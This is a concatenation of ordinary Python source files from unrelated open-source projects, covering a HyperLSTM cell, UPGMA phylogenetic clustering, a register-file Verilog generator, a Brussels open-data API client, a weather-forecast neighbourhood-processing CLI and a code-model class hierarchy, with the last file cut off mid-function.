h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
# concatenate the input and hidden states for hyperlstm input
hyper_input = tf.concat([x, h], 1)
hyper_output, hyper_new_state = self.hyper_cell(hyper_input,
self.hyper_state)
self.hyper_output = hyper_output
self.hyper_state = hyper_new_state
xh = tf.matmul(x, w_xh)
hh = tf.matmul(h, w_hh)
# split Wxh contributions
ix, jx, fx, ox = tf.split(xh, 4, 1)
ix = self.hyper_norm(ix, 'hyper_ix', use_bias=False)
jx = self.hyper_norm(jx, 'hyper_jx', use_bias=False)
fx = self.hyper_norm(fx, 'hyper_fx', use_bias=False)
ox = self.hyper_norm(ox, 'hyper_ox', use_bias=False)
# split Whh contributions
ih, jh, fh, oh = tf.split(hh, 4, 1)
ih = self.hyper_norm(ih, 'hyper_ih', use_bias=True)
jh = self.hyper_norm(jh, 'hyper_jh', use_bias=True)
fh = self.hyper_norm(fh, 'hyper_fh', use_bias=True)
oh = self.hyper_norm(oh, 'hyper_oh', use_bias=True)
# split bias
ib, jb, fb, ob = tf.split(bias, 4, 0) # bias is to be broadcasted.
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i = ix + ih + ib
j = jx + jh + jb
f = fx + fh + fb
o = ox + oh + ob
if self.use_layer_norm:
concat = tf.concat([i, j, f, o], 1)
concat = layer_norm_all(concat, batch_size, 4, self.num_units, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, self.num_units, 'ln_c')) * tf.sigmoid(o)
hyper_h, hyper_c = tf.split(hyper_new_state, 2, 1)
new_total_h = tf.concat([new_h, hyper_h], 1)
new_total_c = tf.concat([new_c, hyper_c], 1)
new_total_state = tf.concat([new_total_h, new_total_c], 1)
return new_h, new_total_state
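# A minimal usage sketch, not part of the original file. It assumes the
# enclosing cell class (whose constructor appears earlier in this file)
# follows the tf.compat.v1 RNNCell interface implied by its state_size and
# output_size properties; the name HyperLSTMCell is an assumption here.
#
#   cell = HyperLSTMCell(num_units=512)
#   inputs = tf.placeholder(tf.float32, [batch_size, seq_len, input_dim])
#   outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)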
u6052029/cogent3 | src/cogent3/cluster/UPGMA.py | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | #!/usr/bin/env python
"""Functions to cluster using UPGMA
upgma takes an dictionary of pair tuples mapped to distances as input.
UPGMA_cluster takes an array and a list of PhyloNode objects corresponding
to the array as input. Can also generate this type of input from a DictArray using
inputs_from_dict_array function.
Both return a PhyloNode object of the UPGMA cluster
"""
import numpy
from numpy import argmin, array, average, diag, ma, ravel, sum, take
from cogent3.core.tree import PhyloNode
from cogent3.util.dict_array import DictArray
__author__ = "Catherine Lozupone"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Catherine Lozuopone", "Rob Knight", "Peter Maxwell"]
__license__ = "BSD-3"
__version__ = "2020.7.2a"
__maintainer__ = "Catherine Lozupone"
__email__ = "[email protected]"
__status__ = "Production"
numerictypes = numpy.core.numerictypes.sctype2char
Float = numerictypes(float)
BIG_NUM = 1e305
def upgma(pairwise_distances):
"""Uses the UPGMA algorithm to cluster sequences
pairwise_distances: a dictionary with pair tuples mapped to a distance
returns a PhyloNode object of the UPGMA cluster
"""
darr = DictArray(pairwise_distances)
matrix_a, node_order = inputs_from_dict_array(darr)
tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM)
index = 0
for node in tree.traverse():
if not node.parent:
node.name = "root"
elif not node.name:
node.name = "edge." + str(index)
index += 1
return tree
def find_smallest_index(matrix):
"""returns the index of the smallest element in a numpy array
for UPGMA clustering elements on the diagonal should first be
substituted with a very large number so that they are always
larger than the rest if the values in the array."""
# get the shape of the array as a tuple (e.g. (3,3))
shape = matrix.shape
# turn into a 1 by x array and get the index of the lowest number
matrix1D = ravel(matrix)
lowest_index = argmin(matrix1D)
# convert the lowest_index derived from matrix1D to one for the original
# square matrix and return
row_len = shape[0]
return divmod(lowest_index, row_len)
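# For example, in a 4x4 matrix the flattened index 9 maps back to
# divmod(9, 4) == (2, 1), i.e. row 2, column 1 of the square matrix.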
def condense_matrix(matrix, smallest_index, large_value):
"""converges the rows and columns indicated by smallest_index
Smallest index is returned from find_smallest_index.
For both the rows and columns, the values for the two indices are
averaged. The resulting vector replaces the first index in the array
and the second index is replaced by an array with large numbers so that
it is never chosen again with find_smallest_index.
"""
first_index, second_index = smallest_index
# get the rows and make a new vector that has their average
rows = take(matrix, smallest_index, 0)
new_vector = average(rows, 0)
# replace info in the row and column for first index with new_vector
matrix[first_index] = new_vector
matrix[:, first_index] = new_vector
# replace the info in the row and column for the second index with
# high numbers so that it is ignored
matrix[second_index] = large_value
matrix[:, second_index] = large_value
return matrix
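# Illustrative sketch of the effect: given
#   m = array([[BIG_NUM, 2.0, 6.0],
#              [2.0, BIG_NUM, 4.0],
#              [6.0, 4.0, BIG_NUM]])
# condense_matrix(m, (0, 1), BIG_NUM) overwrites row/column 0 with the
# element-wise average of rows 0 and 1 (so m[0, 2] becomes 5.0) and fills
# row/column 1 with BIG_NUM, so find_smallest_index never selects it again.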
def condense_node_order(matrix, smallest_index, node_order):
"""condenses two nodes in node_order based on smallest_index info
This function is used to create a tree while condensing a matrix
with the condense_matrix function. The smallest_index is retrieved
with find_smallest_index. The first index is replaced with a node object
that combines the two nodes corresponding to the indices in node order.
The second index in smallest_index is replaced with None.
Also sets the branch length of the nodes to 1/2 of the distance between
the nodes in the matrix"""
index1, index2 = smallest_index
node1 = node_order[index1]
node2 = node_order[index2]
# get the distance between the nodes and assign 1/2 the distance to the
    # length property of each node
distance = matrix[index1, index2]
nodes = [node1, node2]
d = distance / 2.0
for n in nodes:
if n.children:
n.length = d - n.children[0].TipLength
else:
n.length = d
n.TipLength = d
# combine the two nodes into a new PhyloNode object
new_node = PhyloNode()
new_node.children.append(node1)
new_node.children.append(node2)
node1.parent = new_node
node2.parent = new_node
# replace the object at index1 with the combined node
node_order[index1] = new_node
# replace the object at index2 with None
node_order[index2] = None
return node_order
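# Illustrative sketch: if the closest pair is (0, 1) at distance 2.0, both
# nodes receive branch lengths that place their tips at depth 1.0,
# node_order[0] becomes the new parent PhyloNode and node_order[1] is None.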
def UPGMA_cluster(matrix, node_order, large_number):
"""cluster with UPGMA
matrix is a numpy array.
node_order is a list of PhyloNode objects corresponding to the matrix.
large_number will be assigned to the matrix during the process and
should be much larger than any value already in the matrix.
WARNING: Changes matrix in-place.
WARNING: Expects matrix to already have diagonals assigned to large_number
before this function is called.
"""
num_entries = len(node_order)
tree = None
for i in range(num_entries - 1):
smallest_index = find_smallest_index(matrix)
index1, index2 = smallest_index
# if smallest_index is on the diagonal set the diagonal to large_number
if index1 == index2:
matrix[diag([True] * len(matrix))] = large_number
smallest_index = find_smallest_index(matrix)
row_order = condense_node_order(matrix, smallest_index, node_order)
matrix = condense_matrix(matrix, smallest_index, large_number)
tree = node_order[smallest_index[0]]
return tree
def inputs_from_dict_array(darr):
"""makes inputs for UPGMA_cluster from a DictArray object
"""
darr.array += numpy.eye(darr.shape[0]) * BIG_NUM
nodes = list(map(PhyloNode, darr.keys()))
return darr.array, nodes
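# Example of use (an added sketch; the three-taxon distances are made up)
if __name__ == "__main__":
    pairwise_distances = {("a", "b"): 2.0, ("a", "c"): 6.0, ("b", "c"): 6.0}
    tree = upgma(pairwise_distances)
    print(tree)  # newick string; "a" and "b" cluster first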
kf7lsu/RegfileCompiler-public | src/python/make_store_entry.py | 0845f1458137cef06d584047bb4287a72c6afbab | #this code will generate the structural verilog for a single entry in the register file
#takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the
#tristate buffers on the read outputs
#expects the same things as make_store_cell, ensure code is valid there
#Matthew Trahms
#EE 526
#4/20/21
from make_store_cell import make_store_cell
def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num):
#just need to create the correct number of bits
#this and the make_store_array are going to be pretty simple
for bit in range(bits):
make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num)
return
if __name__ == '__main__':
f = open('store_entry_test.txt', 'w')
rows = 4
cols = 2
reads = 2
for row in range(rows):
make_store_entry(f, row, cols, reads, 1, 0)
f.close()
oceandelee/tac | module1/api.py | 62ffbcb31b374a9fa83a1ee6010b2e00f2de8a7c | """API for AVB"""
import json
import sys
import requests
def actualite_found():
osm = "https://opendata.bruxelles.be/api/datasets/1.0/search/?q="
data = {
"nhits":0,
"parameters":{
"dataset":"actualites-ville-de-bruxelles",
"timezone":"UTC",
"q":"actualite",
"language": "fr",
"rows":10,
"start":0,
"sort":[
"published"
]
,
"format":"json"
}
,
"records":[]
}
    resp = requests.get(osm, params=data)
if resp.status_code == 200:
print(resp.json()["datasets"][0]["metas"])
else:
print("actualite not found")
return resp
def get_result(resp, n, attribut):
metas = resp.json()["datasets"][n]["metas"]
return metas[attribut]
def nb_result(resp):
return len(resp.json()["datasets"])
#Example of use
if __name__ == "__main__":
resp = actualite_found()
result = get_result(resp,2,"description")
print(result)
    print(nb_result(resp))
cpelley/improver | improver/cli/nbhood.py | ebf77fe2adc85ed7aec74c26671872a2e4388ded | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Script to run neighbourhood processing."""
from improver import cli
from improver.constants import DEFAULT_PERCENTILES
@cli.clizefy
@cli.with_output
def process(
cube: cli.inputcube,
mask: cli.inputcube = None,
*,
neighbourhood_output,
neighbourhood_shape,
radii: cli.comma_separated_list,
lead_times: cli.comma_separated_list = None,
degrees_as_complex=False,
weighted_mode=False,
area_sum=False,
remask=False,
percentiles: cli.comma_separated_list = DEFAULT_PERCENTILES,
halo_radius: float = None,
):
"""Runs neighbourhood processing.
Apply the requested neighbourhood method via the
NeighbourhoodProcessing plugin to a Cube.
Args:
cube (iris.cube.Cube):
The Cube to be processed.
mask (iris.cube.Cube):
A cube to mask the input cube. The data should contain 1 for
usable points and 0 for discarded points.
Only supported with square neighbourhoods. (Optional)
neighbourhood_output (str):
The form of the results generated using neighbourhood processing.
If "probabilities" is selected, the mean probability with a
neighbourhood is calculated. If "percentiles" is selected, then
the percentiles are calculated with a neighbourhood. Calculating
percentiles from a neighbourhood is only supported for a circular
neighbourhood.
Options: "probabilities", "percentiles".
neighbourhood_shape (str):
Name of the neighbourhood method to use. Only a "circular"
neighbourhood shape is applicable for calculating "percentiles"
output.
Options: "circular", "square".
radii (list of float):
The radius or a list of radii in metres of the neighbourhood to
apply.
If it is a list, it must be the same length as lead_times, which
defines at which lead time to use which nbhood radius. The radius
will be interpolated for intermediate lead times.
lead_times (list of int):
The lead times in hours that correspond to the radii to be used.
If lead_times are set, radii must be a list the same length as
lead_times.
degrees_as_complex (bool):
Include this option to process angles as complex numbers.
Not compatible with circular kernel or percentiles.
weighted_mode (bool):
Include this option to set the weighting to decrease with radius.
Otherwise a constant weighting is assumed.
weighted_mode is only applicable for calculating "probability"
neighbourhood output using the circular kernel.
area_sum (bool):
Return sum rather than fraction over the neighbourhood area.
remask (bool):
Include this option to apply the original un-neighbourhood
processed mask to the neighbourhood processed cube.
Otherwise the original un-neighbourhood processed mask
is not applied. Therefore, the neighbourhood processing may result
in values being present in area that were originally masked.
percentiles (float):
Calculates value at the specified percentiles from the
neighbourhood surrounding each grid point. This argument has no
effect if the output is probabilities.
halo_radius (float):
Set this radius in metres to define the excess halo to clip. Used
where a larger grid was defined than the standard grid and we want
to clip the grid back to the standard grid. Otherwise no clipping
is applied.
Returns:
iris.cube.Cube:
A processed Cube.
Raises:
RuntimeError:
If weighted_mode is used with the wrong neighbourhood_output.
RuntimeError:
If degree_as_complex is used with
neighbourhood_output='percentiles'.
RuntimeError:
If degree_as_complex is used with neighbourhood_shape='circular'.
"""
from improver.nbhood import radius_by_lead_time
from improver.nbhood.nbhood import (
GeneratePercentilesFromANeighbourhood,
NeighbourhoodProcessing,
)
from improver.utilities.pad_spatial import remove_cube_halo
from improver.wind_calculations.wind_direction import WindDirection
sum_or_fraction = "sum" if area_sum else "fraction"
if neighbourhood_output == "percentiles":
if weighted_mode:
            raise RuntimeError(
                'weighted_mode cannot be used with '
                'neighbourhood_output="percentiles"'
            )
if degrees_as_complex:
raise RuntimeError("Cannot generate percentiles from complex " "numbers")
if neighbourhood_shape == "circular":
if degrees_as_complex:
raise RuntimeError(
"Cannot process complex numbers with circular neighbourhoods"
)
if degrees_as_complex:
# convert cube data into complex numbers
cube.data = WindDirection.deg_to_complex(cube.data)
radius_or_radii, lead_times = radius_by_lead_time(radii, lead_times)
if neighbourhood_output == "probabilities":
result = NeighbourhoodProcessing(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
weighted_mode=weighted_mode,
sum_or_fraction=sum_or_fraction,
re_mask=remask,
)(cube, mask_cube=mask)
elif neighbourhood_output == "percentiles":
result = GeneratePercentilesFromANeighbourhood(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
percentiles=percentiles,
)(cube)
if degrees_as_complex:
# convert neighbourhooded cube back to degrees
result.data = WindDirection.complex_to_deg(result.data)
if halo_radius is not None:
result = remove_cube_halo(result, halo_radius)
return result
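# A plausible command-line sketch, not taken from the improver docs: it
# assumes clize's usual kebab-case mapping of the keyword arguments above and
# the --output flag added by cli.with_output; the file names are hypothetical.
#
#   improver nbhood input_cube.nc --neighbourhood-output=probabilities \
#       --neighbourhood-shape=square --radii=10000 --output=out.nc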
ipa-mirb/bonsai | bonsai/model.py | cb73317cdf779566f7c496fc39546c9c689aa09c |
#Copyright (c) 2017 Andre Santos
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
###############################################################################
# Language Model
###############################################################################
class CodeEntity(object):
"""Base class for all programming entities.
All code objects have a file name, a line number, a column number,
a programming scope (e.g. the function or code block they belong to)
and a parent object that should have some variable or collection
holding this object.
"""
def __init__(self, scope, parent):
"""Base constructor for code objects.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
self.scope = scope
self.parent = parent
self.file = None
self.line = None
self.column = None
def walk_preorder(self):
"""Iterates the program tree starting from this object, going down."""
yield self
for child in self._children():
for descendant in child.walk_preorder():
yield descendant
def filter(self, cls, recursive=False):
"""Retrieves all descendants (including self) that are instances
of a given class.
Args:
cls (class): The class to use as a filter.
Kwargs:
recursive (bool): Whether to descend recursively down the tree.
"""
source = self.walk_preorder if recursive else self._children
return [
codeobj
for codeobj in source()
if isinstance(codeobj, cls)
]
def _afterpass(self):
"""Finalizes the construction of a code entity."""
pass
def _validity_check(self):
"""Check whether this object is a valid construct."""
return True
def _children(self):
"""Yield all direct children of this object."""
# The default implementation has no children, and thus should return
# an empty iterator.
return iter(())
def _lookup_parent(self, cls):
"""Lookup a transitive parent object that is an instance
of a given class."""
codeobj = self.parent
while codeobj is not None and not isinstance(codeobj, cls):
codeobj = codeobj.parent
return codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return (' ' * indent) + self.__str__()
def ast_str(self, indent=0):
"""Return a minimal string to print a tree-like structure.
Kwargs:
indent (int): The number of indentation levels.
"""
line = self.line or 0
col = self.column or 0
name = type(self).__name__
spell = getattr(self, 'name', '[no spelling]')
result = ' ({})'.format(self.result) if hasattr(self, 'result') else ''
prefix = indent * '| '
return '{}[{}:{}] {}{}: {}'.format(prefix, line, col,
name, result, spell)
def __str__(self):
"""Return a string representation of this object."""
return self.__repr__()
def __repr__(self):
"""Return a string representation of this object."""
return '[unknown]'
class CodeStatementGroup(object):
"""This class is meant to provide common utility methods for
objects that group multiple program statements together
(e.g. functions, code blocks).
It is not meant to be instantiated directly, only used for
inheritance purposes.
It defines the length of a statement group, and provides methods
for integer-based indexing of program statements (as if using a list).
"""
def statement(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.body.statement(i)
def statement_after(self, i):
"""Return the statement after the *i*-th one, or `None`."""
try:
return self.statement(i + 1)
        except IndexError:
return None
def __getitem__(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.statement(i)
def __len__(self):
"""Return the length of the statement group."""
return len(self.body)
# ----- Common Entities -------------------------------------------------------
class CodeVariable(CodeEntity):
"""This class represents a program variable.
A variable typically has a name, a type (`result`) and a value
(or `None` for variables without a value or when the value is unknown).
Additionally, a variable has an `id` which uniquely identifies it in
the program (useful to resolve references), a list of references to it
and a list of statements that write new values to the variable.
If the variable is a *member*/*field*/*attribute* of an object,
`member_of` should contain a reference to such object, instead of `None`.
"""
def __init__(self, scope, parent, id, name, result):
"""Constructor for variables.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this variable.
name (str): The name of the variable in the program.
result (str): The type of the variable in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.value = None
self.member_of = None
self.references = []
self.writes = []
@property
def is_definition(self):
return True
@property
def is_local(self):
"""Whether this is a local variable.
In general, a variable is *local* if its containing scope is a
statement (e.g. a block), or a function, given that the variable
is not one of the function's parameters.
"""
return (isinstance(self.scope, CodeStatement)
or (isinstance(self.scope, CodeFunction)
and self not in self.scope.parameters))
@property
def is_global(self):
"""Whether this is a global variable.
In general, a variable is *global* if it is declared directly under
the program's global scope or a namespace.
"""
return isinstance(self.scope, (CodeGlobalScope, CodeNamespace))
@property
def is_parameter(self):
"""Whether this is a function parameter."""
return (isinstance(self.scope, CodeFunction)
and self in self.scope.parameters)
@property
def is_member(self):
"""Whether this is a member/attribute of a class or object."""
return isinstance(self.scope, CodeClass)
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeEntity):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '{}{} {} = {}'.format(' ' * indent, self.result, self.name,
pretty_str(self.value))
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {} = ({})'.format(self.result, self.name, self.value)
class CodeFunction(CodeEntity, CodeStatementGroup):
"""This class represents a program function.
A function typically has a name, a return type (`result`), a list
of parameters and a body (a code block). It also has an unique `id`
that identifies it in the program and a list of references to it.
If a function is a method of some class, its `member_of` should be
set to the corresponding class.
"""
def __init__(self, scope, parent, id, name, result, definition=True):
"""Constructor for functions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this function.
name (str): The name of the function in the program.
result (str): The return type of the function in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.parameters = []
self.body = CodeBlock(self, self, explicit=True)
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a function definition or just a declaration."""
return self._definition is self
@property
def is_constructor(self):
"""Whether this function is a class constructor."""
return self.member_of is not None
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, (CodeStatement, CodeExpression))
self.body._add(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.parameters:
yield codeobj
for codeobj in self.body._children():
yield codeobj
def _afterpass(self):
"""Assign a function-local index to each child object and register
write operations to variables.
This should only be called after the object is fully built.
"""
if hasattr(self, '_fi'):
return
fi = 0
for codeobj in self.walk_preorder():
codeobj._fi = fi
fi += 1
if isinstance(codeobj, CodeOperator) and codeobj.is_assignment:
if codeobj.arguments and isinstance(codeobj.arguments[0],
CodeReference):
var = codeobj.arguments[0].reference
if isinstance(var, CodeVariable):
var.writes.append(codeobj)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
params = ', '.join(map(lambda p: p.result + ' ' + p.name,
self.parameters))
if self.is_constructor:
pretty = '{}{}({}):\n'.format(spaces, self.name, params)
else:
pretty = '{}{} {}({}):\n'.format(spaces, self.result,
self.name, params)
if self._definition is not self:
pretty += spaces + ' [declaration]'
else:
pretty += self.body.pretty_str(indent + 2)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
params = ', '.join(map(str, self.parameters))
return '[{}] {}({})'.format(self.result, self.name, params)
class CodeClass(CodeEntity):
"""This class represents a program class for object-oriented languages.
A class typically has a name, an unique `id`, a list of
members (variables, functions), a list of superclasses, and a list of
references.
If a class is defined within another class (inner class), it should
have its `member_of` set to the corresponding class.
"""
def __init__(self, scope, parent, id_, name, definition=True):
"""Constructor for classes.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this class.
name (str): The name of the class in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id_
self.name = name
self.members = []
self.superclasses = []
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a definition or a declaration of the class."""
return self._definition is self
def _add(self, codeobj):
"""Add a child (function, variable, class) to this object."""
assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass))
self.members.append(codeobj)
codeobj.member_of = self
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.members:
yield codeobj
def _afterpass(self):
"""Assign the `member_of` of child members and call
their `_afterpass()`.
This should only be called after the object is fully built.
"""
for codeobj in self.members:
if not codeobj.is_definition:
                if codeobj._definition is not None:
codeobj._definition.member_of = self
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = spaces + 'class ' + self.name
if self.superclasses:
superclasses = ', '.join(self.superclasses)
pretty += '(' + superclasses + ')'
pretty += ':\n'
if self.members:
pretty += '\n\n'.join(
c.pretty_str(indent + 2)
for c in self.members
)
else:
pretty += spaces + ' [declaration]'
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[class {}]'.format(self.name)
class CodeNamespace(CodeEntity):
"""This class represents a program namespace.
A namespace is a concept that is explicit in languages such as C++,
but less explicit in many others. In Python, the closest thing should
be a module. In Java, it may be the same as a class, or non-existent.
A namespace typically has a name and a list of children objects
(variables, functions or classes).
"""
def __init__(self, scope, parent, name):
"""Constructor for namespaces.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the namespace in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}namespace {}:\n'.format(spaces, self.name)
pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[namespace {}]'.format(self.name)
class CodeGlobalScope(CodeEntity):
"""This class represents the global scope of a program.
The global scope is the root object of a program. If there are no
better candidates, it is the `scope` and `parent` of all other objects.
It is also the only object that does not have a `scope` or `parent`.
"""
def __init__(self):
"""Constructor for global scope objects."""
CodeEntity.__init__(self, None, None)
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '\n\n'.join(
codeobj.pretty_str(indent=indent)
for codeobj in self.children
)
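# A minimal construction sketch (the id value is made up, and the module-level
# pretty_str helper used by CodeVariable.pretty_str is defined later in this
# file):
#
#   program = CodeGlobalScope()
#   var = CodeVariable(program, program, 1, 'x', 'int')
#   var._add(42)
#   program._add(var)
#   print(program.pretty_str())   # -> int x = 42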
# ----- Expression Entities ---------------------------------------------------
class CodeExpression(CodeEntity):
"""Base class for expressions within a program.
Expressions can be of many types, including literal values,
operators, references and function calls. This class is meant
to be inherited from, and not instantiated directly.
An expression typically has a name (e.g. the name of the function
in a function call) and a type (`result`). Also, an expression should
indicate whether it is enclosed in parentheses.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for expressions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the expression in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.result = result
self.parenthesis = paren
@property
def function(self):
"""The function where this expression occurs."""
return self._lookup_parent(CodeFunction)
@property
def statement(self):
"""The statement where this expression occurs."""
return self._lookup_parent(CodeStatement)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
return (' ' * indent) + '(' + self.name + ')'
return (' ' * indent) + self.name
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {}'.format(self.result, self.name)
class SomeValue(CodeExpression):
"""This class represents an unknown value for diverse primitive types."""
def __init__(self, result):
"""Constructor for unknown values."""
CodeExpression.__init__(self, None, None, result, result)
def _children(self):
"""Yield all the children of this object, that is no children."""
return iter(())
SomeValue.INTEGER = SomeValue("int")
SomeValue.FLOATING = SomeValue("float")
SomeValue.CHARACTER = SomeValue("char")
SomeValue.STRING = SomeValue("string")
SomeValue.BOOL = SomeValue("bool")
class CodeLiteral(CodeExpression):
"""Base class for literal types not present in Python.
This class is meant to represent a literal whose type is not numeric,
string or boolean, as bare Python literals are used for those.
A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`),
and could be enclosed in parentheses. It does not have a name.
"""
def __init__(self, scope, parent, value, result, paren=False):
"""Constructor for literals.
As literals have no name, a constant string is used instead.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (CodeExpression|CodeExpression[]): This literal's value.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, 'literal', result, paren)
self.value = value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
